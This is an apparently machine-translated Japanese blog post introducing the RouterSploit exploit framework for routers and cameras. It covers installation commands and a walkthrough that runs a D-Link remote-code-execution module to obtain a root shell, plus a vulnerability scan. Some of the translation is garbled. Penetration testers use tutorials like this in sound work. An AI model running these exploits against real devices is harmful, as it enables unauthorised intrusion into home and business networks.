RouterSploit 組み込みデバイス用に特別に作成された驚くべきエクスプロイトフレームワークです.
ペンテスターはこのツールを使用して、カメラとルーターのセキュリティをスキャンできます.
目次
RouterSploitのハイライト:
- Pythonでコーディング.
- コマンドラインインターフェイス.
- Dockerサポート.
- モジュラーツール.
サポートされているOS:
- マックOS.
- Linux.
- Androidフォン.
- ウィンドウズ.
RouterSploitのインストール:
必要条件:
- 未来
- リクエスト
- paramiko
- pysnmp
- pycrypto
オプション:
- ブルーピー – ブルートゥース低エネルギー
KaliLinuxへのインストール:
以下のコマンドに従ってください:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth LowEnergyのサポート:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Ubuntuへのインストール:
以下のコマンドに従ってください:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth LowEnergyのサポート:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
MacOSへのインストール:
以下のコマンドに従ってください:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Dockerへのインストール:
以下のコマンドに従ってください:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
RouterSploitを更新する方法?
不便を避けるために、RouterSploitを頻繁に更新する必要があります.
新しいモジュールはほぼ毎日出荷されます.
cd routersploit
git pull
RouterSploitの使用方法?
使用法
root @ kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_ / / ___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_ | // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __ / | /\__ / / |_) | | (_) | | |_ \_| \_ ___ / __,_|\__ ___|_| \____ /| .__ /|_|\___ /|_|\__| | | のエクスプロイトフレームワーク |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.3.0 ホームページ : https://www.threat9.com/ - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com/ Exploits: 128 スキャナー: 4 信条: 165 ジェネリック: 4 ペイロード: 32 エンコーダー: 6 rsf >
エクスプロイト:
搾取を実行するには, モジュールを選択してターゲットを設定するだけです:
rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
完了するには、Tabキーを使用します.
オプションを表示するには, タイプshow
:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
名前現在の設定説明
---- ---------------- -----------
ターゲットターゲットアドレス例:. http://192.168.1.1
ポート 80 ターゲットポート
使用するrun
またはexploit
ターゲットを悪用するコマンド:
rsf (D-LINK DIR-300 & DIR-600 RCE) > 走る
[+] ターゲットは脆弱です
[*] コマンドループの呼び出し。.
cmd > whoami
root
オプションを設定するには:
rsf (D-LINK DIR-300 & DIR-600 RCE) > ターゲットhttpを設定します://192.168.1.1 [+] {'目標': 'http://192.168.1.1'}
ターゲットが特定のエクスプロイトに対して脆弱かどうかを確認することができます:
rsf (D-LINK DIR-300 & DIR-600 RCE) > 小切手 [+] ターゲットは脆弱です
実行show info
エクスプロイトに関する情報を表示するには.
脆弱なターゲットのスキャン:
スキャナーを使用すると、ターゲットがエクスプロイトに対して脆弱かどうかをすばやく確認できます.
同じコマンドを使用して、オプションを表示/設定します, そしてまた実行する.
rsf (D-Linkスキャナー) > 走る [+] エクスプロイト/ dlink / dwr_932_info_disclosureは脆弱です [-] エクスプロイト/ dlink / dir_300_320_615_auth_bypassは脆弱ではありません [-] エクスプロイト/ dlink / dsl_2750b_info_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dns_320l_327l_rceは脆弱ではありません [-] エクスプロイト/ dlink / dir_645_password_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dir_300_600_615_info_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dir_300_600_rceは脆弱ではありません [+] デバイスは脆弱です! - エクスプロイト/ dlink / dwr_932_info_disclosure
また読む: 1337xプロキシ
最後の言葉:
RouterSploit 使用する素晴らしいツールです.
に関する問題に直面した場合 RouterSploit. 以下にコメントしてください. 私たちのチームCSHAWKはできるだけ早くあなたと連絡を取ります.